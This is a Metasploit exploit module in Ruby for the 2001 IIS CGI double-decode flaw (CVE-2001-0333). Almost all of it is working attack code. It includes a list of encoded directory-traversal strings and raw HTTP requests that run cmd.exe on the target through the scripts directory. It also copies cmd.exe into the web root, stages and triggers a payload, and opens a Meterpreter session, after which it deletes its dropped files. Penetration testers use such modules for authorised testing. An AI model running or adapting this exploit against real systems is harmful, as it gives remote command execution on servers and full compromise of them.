## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex/proto/tftp' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server # is not a valid HttpResponse include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStagerTFTP def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution', 'Description' => %q{ This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory. }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2001-0333' ], [ 'OSVDB', '556' ], [ 'BID', '2708' ], [ 'MSB', 'MS01-026' ], [ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2001' )) register_options( [ Opt::RPORT(80), OptString.new('WINDIR', [ false, 'The windows directory of the target host', nil ]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ]) ], self.class) framework.events.add_exploit_subscriber(self) end def dotdotslash possibilities = [ "..%255c", "..%%35c", "..%%35%63", "..%25%35%63", ".%252e/", "%252e./", "%%32%65./", ".%%32%65/", ".%25%32%65/", "%25%32%65./" ] possibilities[rand(possibilities.length)] end def mini_http_request(opts, timeout=5) connect req = '' req << opts['method'] req << ' ' req << opts['uri'] req << ' ' req << "HTTP/1.0\r\n" req << "Host: #{datastore['RHOST']}\r\n" req << "\r\n" sock.put(req) # This isn't exactly awesome, but it seems to work.. begin headers = sock.get_once(-1, timeout) || '' body = sock.get_once(-1, timeout) || '' rescue ::EOFError # nothing end if (datastore['DEBUG']) print_status("Headers:\n" + headers.inspect) print_status("Body:\n" + body.inspect) end disconnect [headers, body] end def detect_windows_dir() win_dirs = [ 'winnt', 'windows' ] win_dirs.each { |dir| res = execute_command("dir", { :windir => dir }) if (res.kind_of?(Array)) body = res[1] if (body and body =~ /Directory of /) return dir end end } return nil end def check @win_dir = detect_windows_dir() if @win_dir return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end # # NOTE: the command executes regardless of whether or not # a valid response is returned... # def execute_command(cmd, opts = {}) # Don't try the start command... # Using the "start" method doesn't seem to make iis very happy :( return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/ print_status("Executing command: #{cmd} (options: #{opts.inspect})") uri = '/scripts/' exe = opts[:cgifname] if (not exe) uri << dotdotslash uri << dotdotslash uri << (opts[:windir] || @win_dir) uri << '/system32/cmd.exe' else uri << exe end uri << '?/x+/c+' uri << Rex::Text.uri_encode(cmd) vprint_status("Attempting to execute: #{uri}") mini_http_request({ 'uri' => uri, 'method' => 'GET', }, 20) end def exploit @win_dir = datastore['WINDIR'] if not @win_dir # try to detect the windows directory @win_dir = detect_windows_dir() if not @win_dir fail_with(Exploit::Failure::NoTarget, "Unable to detect the target host windows directory (maybe not vulnerable)!") end end print_status("Using windows directory \"#{@win_dir}\"") # now copy the file exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...") # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory # Unfortunately, using %SystemRoot% doesn't seem to work :( res = execute_command("copy \\#{@win_dir}\\system32\\cmd.exe #{exe_fname}") if (datastore['CMD']) res = execute_command(datastore['CMD'], { :cgifname => exe_fname }) if (res[0]) print_status("Command output:\n" + res[0]) else print_error("No output received") end res = execute_command("del #{exe_fname}") return end # Use the CMD stager to get a payload running execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname }) # Save these file names for later deletion @exe_cmd_copy = exe_fname @exe_payload = payload_exe # Just for good measure, we'll make a quick, direct request for the payload # Using the "start" method doesn't seem to make iis very happy :( print_status("Triggering the payload via a direct request...") mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1) handler end # # The following handles deleting the copied cmd.exe and payload exe! # def on_new_session(client) if client.type != "meterpreter" print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") print_error("The copied exe and the payload exe must be removed manually.") return end return if not @exe_cmd_copy # stdapi must be loaded before we can use fs.file client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") # Delete the copied CMD.exe print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...") client.fs.file.rm(@exe_cmd_copy) # Migrate so that we can delete the payload exe client.console.run_single("run migrate -f") # Delete the payload exe return if not @exe_payload delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload print_status("Changing permissions on #{delete_me_too} ...") cmd = "C:\\#{@win_dir}\\system32\\attrib.exe -r -h -s " + delete_me_too client.sys.process.execute(cmd, nil, {'Hidden' => true }) print_warning("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e print_error("Exception: #{e.inspect}") end end def cleanup framework.events.remove_exploit_subscriber(self) end end